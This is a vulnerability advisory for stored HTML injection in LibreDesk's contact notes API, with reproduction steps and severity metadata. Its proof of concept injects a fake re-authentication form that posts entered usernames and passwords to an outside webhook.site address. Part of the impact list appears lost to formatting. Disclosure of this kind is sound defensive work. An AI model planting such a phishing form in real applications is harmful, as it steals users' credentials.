LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks.
When notes are added through the LibreDesk web application, the client sends note content wrapped inside <p> tags. The backend appears to trust this HTML structure and stores the content as-is.
By intercepting the request to:
POST /api/v1/contacts/3/notes
and removing the <p> wrapper, an attacker can submit arbitrary HTML content. The backend does not sanitize or validate the HTML payload before persisting it.
As a result:
<form>, <input>, <img>) are storedThis indicates that the application relies on client-side HTML formatting assumptions, which can be bypassed by modifying the request.
Log in to LibreDesk and open any contact.
Add a note normally via the UI.
Intercept the request to:
POST /api/v1/contacts/3/notes
Original request body (example):
{
"note": "<p>This is a normal note</p>"
}
Modify the payload by removing the <p> tag and injecting arbitrary HTML:
{
"note": "<form action='https://webhook.site/xxxx' method='POST'>
<input type='text' name='username' placeholder='Username'>
<input type='password' name='password' placeholder='Password'>
<input type='submit' value='Re-authenticate'>
</form>"
}
Forward the request.
View the contact note in the LibreDesk UI.
Result: The injected HTML form is rendered inside the application.
This is a stored HTML injection vulnerability affecting any user who can add or view contact notes.
Potential impact includes:
If the notes are shared across users or roles, this vulnerability can be abused to target multiple users, increasing severity.
{
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-16T20:43:16Z",
"nvd_published_at": "2025-12-27T01:15:42Z",
"severity": "HIGH"
}